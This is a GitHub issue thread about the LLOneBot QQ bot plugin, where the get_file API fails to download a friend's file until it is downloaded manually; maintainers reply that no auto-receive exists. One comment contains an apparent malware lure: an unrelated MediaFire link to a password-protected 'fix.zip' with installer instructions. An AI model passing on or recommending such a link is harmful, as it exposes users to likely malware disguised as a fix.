### ISSUE TITLE
能否 直接用get_file 就自动下载file id 对应的文件，或有否其它api 能够 自动接收好友 发来的文件 （或自动接收文件 ）

### ISSUE THREAD

**Issue by tmtony** [LLOneBot/LLOneBot#369]
系统版本
Microsoft Windows server 2019 datacenter 1809

QQNT 版本
9.9.12-26466

LLOneBot 版本
3.27.4 
 

**1. 收到好友 发文件 私聊消息，但还没有下载文件** 
{"self_id":171718523,"user_id":1234678,"time":1724650383,"message_id":-2147481294,"real_id":-22222224,"message_seq":-2147481294,"message_type":"private","sender":{"user_id":1234567,"nickname":"tonyXXX","card":""},"raw_message":"[CQ:file,file=HP
Test.zip,path=,file_id=12361901f95b09df4de35ea1c783c368_a9939e22-636c-11ef-a11b-61e259a709e0,file_size=1044212]","font":14,"sub_type":"friend","message":[{"data":{"file":"HPTest.zip","path":"","file_id":"12361901f95b09df4de35ea1c783c368_a9939e22-636c-11ef-a11b-61e259a709e0","file_size":"1044212"},"type":"file"}],"message_format":"array","post_type":"message"}
**2.  发送消息 get_file 用file_id去下载此文件，出错**
  {"action":"get_file","params":{"file_id":"12361901f95b09df4de35ea1c783c368_a9939e22-636c-11ef-a11b-61e259a709e0"}}
  
如未手工点下载，是这个错误
{"status":"failed","retcode":1200,"data":null,"message":"Error: 文件不存在: \n    at Timeout.check [as _onTimeout] (C:\\Users\\admin\\LiteLoaderQQNT-main\\plugins\\LLOneBot\\main\\main.cjs:4316:16)\n    at listOnTimeout (node:internal/timers:573:17)\n    at process.processTimers (node:internal/timers:514:7)","wording":"Error: 文件不存在: \n    at Timeout.check [as _onTimeout] (C:\\Users\\admin\\LiteLoaderQQNT-main\\plugins\\LLOneBot\\main\\main.cjs:4316:16)\n    at listOnTimeout (node:internal/timers:573:17)\n    at process.processTimers (node:internal/timers:514:7)"}
 
**3.  如手动在QQ 软件中手工点一下下载文件 后，再调用**

  {"action":"get_file","params":{"file_id":"12361901f95b09df4de35ea1c783c368_a9939e22-636c-11ef-a11b-61e259a709e0"}}

  则是成功的

{"status":"ok","retcode":0,"data":{"file":"C:\\Users\\admin\\Downloads\\HP.zip","file_size":"1044212","file_name":"HPtest.zip"},"message":"","wording":""}

**能否 直接用get_file 就自动下载，或有否其它api 能够 自动接收好友 发来的文件 （或自动接收文件 ）**

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tmtony** [comment]
好像这个版本3.27.4 突然又可以了，不知何故。现在又可以了。
只是下载文件比较大时，要多等一会

**Comment by idranme** [comment]
> 好像这个版本3.27.4 突然又可以了，不知何故。现在又可以了。 只是下载文件比较大时，要多等一会

更新一下 LLOneBot

**Comment by youmu1** [comment]
请问现在可以做到自动接收文件了吗？

**Comment by linyuchen** [comment]
> 请问现在可以做到自动接收文件了吗？

没有自动下载的功能，需要调用`get_file`下载
